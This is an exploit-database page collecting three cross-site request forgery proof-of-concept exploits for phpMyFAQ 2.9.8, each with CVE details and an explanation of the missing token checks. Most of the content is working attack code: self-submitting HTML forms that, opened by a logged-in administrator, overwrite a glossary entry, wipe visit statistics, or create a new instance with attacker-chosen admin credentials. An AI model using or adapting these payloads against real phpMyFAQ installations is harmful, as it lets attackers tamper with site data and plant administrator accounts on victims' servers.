## https://sploitus.com/exploit?id=PACKETSTORM:212427
# Exploit Title: phpMyFAQ 2.9.8 Cross-Site Request Forgery (CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu Windows
# CVE : CVE-2017-15735
PoC:
While still logged in, open another browser window:
<html>
<body>
<form action="http://phpmyfaq/admin/index.php?action=updateglossary" method="POST">
<input type="hidden" name="id" value="1">
<input type="hidden" name="item" value="Malicious Glossary Item">
<input type="hidden" name="definition" value="This is a malicious definition.">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Some Details:
{
"Protection Mechanisms Before Patch": "There was no CSRF token validation in place for the glossary modification actions (add, update, delete). The patch introduced CSRF token checks for both POST and GET requests to ensure that only authorized sessions could perform these actions.",
"File Navigation Chain": "Public Access Entry URL -> phpmyfaq/admin/index.php -> glossary.main.php -> glossary.edit.php",
"Execution Path Constraints": "The user must be authenticated with the necessary permissions ('editglossary') to reach and interact with the glossary functionality through the 'index.php' entry point. Without proper authentication, the server redirects to the login form.",
"Request Parameters": "id, item, definition",
"Request Method": "POST",
"Request URL": "http://phpmyfaq/admin/index.php?action=updateglossary",
"Final PoC": "```\n<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=updateglossary\" method=\"POST\">\n <input type=\"hidden\" name=\"id\" value=\"1\">\n <input type=\"hidden\" name=\"item\" value=\"Malicious Glossary Item\">\n <input type=\"hidden\" name=\"definition\" value=\"This is a malicious definition.\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>document.forms[0].submit();</script>\n </body>\n</html>\n```"
}
------
# Exploit Title: phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu Windows
# CVE : CVE-2017-15734
PoC:
Get http://phpmyfaq/admin/index.php?action=clear-visits
Reproduction: While still logged in, open another browser window to access the link.
Some Details:
{
"Protection Mechanisms Before Patch": "No CSRF token validation was implemented in the 'clear-visits' action within the stat.main.php file, allowing requests to be made without verifying the authenticity of the request origin.",
"File Navigation Chain": "Public Access Entry URL: http://phpmyfaq/admin/index.php -> Vulnerable File: phpmyfaq/admin/stat.main.php",
"Execution Path Constraints": "The user must be authenticated and possess the appropriate permissions to access the 'clear-visits' action. The navigation to the vulnerable file relies on the 'action' parameter within the admin index.php file, which must be set to 'clear-visits'.",
"Request Parameters": "action=clear-visits",
"Request Method": "GET",
"Request URL": "http://phpmyfaq/admin/index.php?action=clear-visits",
"Final PoC": "<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=clear-visits\" method=\"GET\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>"
}
-----
# Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: 2.9.8
# Tested on: Windows 10
# CVE : CVE-2017-15808
PoC:
<html>
<body>
<form action="http://phpmyfaq/admin/index.php" method="GET">
<input type="hidden" name="action" value="ajax">
<input type="hidden" name="ajax" value="config">
<input type="hidden" name="ajaxaction" value="add_instance">
<input type="hidden" name="url" value="malicious">
<input type="hidden" name="instance" value="malicious_instance">
<input type="hidden" name="comment" value="CSRF Test">
<input type="hidden" name="email" value="attacker@example.com">
<input type="hidden" name="admin" value="attacker">
<input type="hidden" name="password" value="password123">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Steps to Reproduce:
1. Save the following code as poc.html.
2. Log in phpmyfaq, and open the file in the same browser.
3. The outcome will occur.